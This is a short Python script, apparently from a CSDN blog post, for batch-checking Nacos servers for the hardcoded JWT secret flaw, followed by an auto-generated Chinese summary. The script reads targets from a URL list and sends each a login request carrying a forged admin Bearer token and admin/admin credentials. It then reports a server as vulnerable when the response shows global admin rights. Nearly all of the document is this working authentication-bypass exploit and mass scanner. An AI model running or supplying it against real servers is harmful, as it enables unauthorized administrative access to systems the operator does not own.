import requests
def check_vulnerability(url):
endpoint = url.rstrip('/') + '/nacos/v1/auth/users/login'
headers = {
'User-Agent': 'ua',
'Accept': 'application/json, text/plain, */*',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Connection': 'close',
'Referer': url + '/nacos/',
'Authorization': 'Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY4NzI4MDQ0MX0.rrdXzPvfY5tf_fAxkWwT6-GEkaRXXGhy1U2bdPceYKc'
}
data = {
'username': 'admin',
'password': 'admin'
}
try:
response = requests.post(endpoint, headers=headers, data=data, verify=False, timeout=5)
if response.status_code == 200 and 'globalAdmin":true' in response.text:
return True
else:
return False
except requests.exceptions.Timeout:
print(url + ' 请求超时,跳过此URL。')
return False
except requests.exceptions.RequestException as e:
print(url + ' 请求异常: ' + str(e))
return False
def main():
with open('urls.txt', 'r') as f:
urls = f.readlines()
for url in urls:
url = url.strip()
is_vulnerable = check_vulnerability(url)
if is_vulnerable:
print('漏洞存在:', url)
else:
print('漏洞不存在:', url)
if __name__ == '__main__':
main()
nacos jwt 硬编码key 批量检测
最新推荐文章于 2024-10-23 22:40:04 发布
该脚本使用Python的requests库进行HTTP请求,检查给定URL是否存在特定的安全漏洞。它尝试模拟登录Nacos系统API,验证管理员权限响应,如果存在漏洞则返回True,否则返回False。程序读取urls.txt文件中的URL列表进行批量检测。
摘要由CSDN通过智能技术生成